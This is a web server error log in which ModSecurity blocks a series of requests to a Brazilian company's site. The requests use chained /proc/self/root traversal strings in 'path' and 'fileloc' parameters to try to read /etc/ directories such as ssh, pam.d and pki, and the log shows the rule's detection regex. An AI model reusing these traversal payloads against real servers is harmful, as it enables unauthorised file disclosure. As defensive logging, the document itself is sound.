[Fri Mar 20 03:43:41.493814 2026] [:error] [pid 11642:tid 140411607643904] [client 74.7.243.128:39430] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzsnbninkcc-iUj5AotXAAAA5A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 03:43:41.792036 2026] [:error] [pid 7893:tid 140411716749056] [client 74.7.241.31:58326] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzsnRCii7xarUs8iHYzoQAAAgM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:43:43.097147 2026] [:error] [pid 11167:tid 140411733534464] [client 74.7.241.31:58340] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzsn_HIg5MgXLBnicPLHgAAAcE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:43:43.827910 2026] [:error] [pid 11167:tid 140411632822016] [client 74.7.243.128:56158] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzsn_HIg5MgXLBnicPLHwAAAc0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:43:46.300839 2026] [:error] [pid 26799:tid 140411674785536] [client 74.7.243.128:56174] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzsota6ubjKNq_cu4ad4gAAA0g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:43:50.172751 2026] [:error] [pid 11167:tid 140411607643904] [client 74.7.241.31:58350] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzspPHIg5MgXLBnicPLKgAAAdA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:43:52.750401 2026] [:error] [pid 11642:tid 140411666392832] [client 74.7.241.31:40182] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzsp7ninkcc-iUj5AotYQAAA4k"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:43:55.221981 2026] [:error] [pid 10189:tid 140411708356352] [client 74.7.241.31:40198] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzsqzJ3M9BSuKP7CAbfmAAAAIQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:43:57.694904 2026] [:error] [pid 11167:tid 140411616036608] [client 74.7.241.31:40212] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzsrfHIg5MgXLBnicPLMAAAAc8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:43:58.936020 2026] [:error] [pid 15826:tid 140411540502272] [client 74.7.241.31:50664] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzsruoXxyEfFpUF8f9TSAAAAVg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:44:02.503206 2026] [:error] [pid 10189:tid 140411658000128] [client 74.7.241.31:50670] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzssjJ3M9BSuKP7CAbfnAAAAIo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:44:03.177293 2026] [:error] [pid 21219:tid 140411641214720] [client 74.7.243.128:56186] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzss_XLqtnMIWvjpaJoqAAAAow"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:44:30.720367 2026] [:error] [pid 15826:tid 140411699963648] [client 74.7.243.128:40114] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzszuoXxyEfFpUF8f9TbAAAAUU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:44:37.211916 2026] [:error] [pid 26799:tid 140411691570944] [client 74.7.243.128:55206] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tenable_tag"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzs1da6ubjKNq_cu4aeAQAAA0Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:44:43.175266 2026] [:error] [pid 11167:tid 140411725141760] [client 74.7.241.31:50684] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzs2_HIg5MgXLBnicPLZAAAAcI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:44:44.490862 2026] [:error] [pid 15826:tid 140411565680384] [client 74.7.241.31:33506] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzs3OoXxyEfFpUF8f9TeAAAAVU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:44:46.023450 2026] [:error] [pid 15826:tid 140411632822016] [client 74.7.243.128:55212] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzs3uoXxyEfFpUF8f9TegAAAU0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:44:46.856232 2026] [:error] [pid 11167:tid 140411716749056] [client 74.7.241.31:33514] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzs3vHIg5MgXLBnicPLZwAAAcM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:44:50.269810 2026] [:error] [pid 7893:tid 140411666392832] [client 74.7.241.31:36480] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzs4hCii7xarUs8iHYzzgAAAgk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:44:51.582772 2026] [:error] [pid 11167:tid 140411599251200] [client 74.7.241.31:36484] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzs4_HIg5MgXLBnicPLagAAAdE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 03:44:52.574994 2026] [:error] [pid 10189:tid 140411649607424] [client 74.7.243.128:42000] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzs5DJ3M9BSuKP7CAbf0AAAAIs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
